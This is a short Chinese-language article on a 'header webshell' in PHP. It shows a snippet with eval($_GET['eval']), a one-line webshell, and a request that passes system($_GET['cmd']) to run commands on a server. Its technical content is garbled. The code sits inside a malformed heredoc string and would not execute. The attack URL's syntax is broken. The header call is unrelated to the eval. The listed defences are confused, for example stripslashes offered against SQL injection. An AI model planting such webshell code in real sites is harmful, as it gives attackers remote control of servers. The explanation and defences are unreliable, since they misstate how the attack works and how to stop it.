PHP中的header函數被廣泛應用于HTTP響應頭的設置，但在某些情況下，它可以被非法攻擊者利用來執行已經預設的惡意代碼，這就是所謂的“header webshell”。

具體來說，header webshell是通過在header函數中注入惡意代碼來達到遠程控制服務器的目的，這種攻擊方式既難以發現，也難以防御。例如以下代碼：

<?php
$php = <<< 'PHP';
echo "Hello World!";
header("Content-Type:".$_GET['content_type']);
eval($_GET['eval']);
$PHP;
?>

當攻擊者訪問這個.php文件時，可以通過如下方式執行遠程代碼：

GET http://example.com/cgi-bin/cmd.php?content_type=text/html;eval=system($_GET['cmd']);

通過上面的代碼，攻擊者就可以在服務器上執行任意代碼，如執行系統命令、下載文件、上傳文件等惡意行為。

然而，也有一些防御措施可以應對header webshell的攻擊，例如：

• 過濾特殊字符：可以過濾掉eval中的一些特殊字符，如“["和“]”等，可以使用stripslashes函數來避免SQL注入。
• 上載文件權限：可以設置PHP在安裝時的權限，以確保文件上載限制在指定目錄下，防止安全問題。
• 修改網站目錄權限：可以使用chmod命令來修改網站目錄為只讀權限，以避免網站被攻擊者利用。

總之，作為一種普遍的攻擊方式，header webshell十分危險，因此在使用header函數時，一定要注意安全問題，避免出現類似的攻擊。同時，網站開發者也應該加強安全意識，采取更加有效的措施來防止攻擊者入侵網站。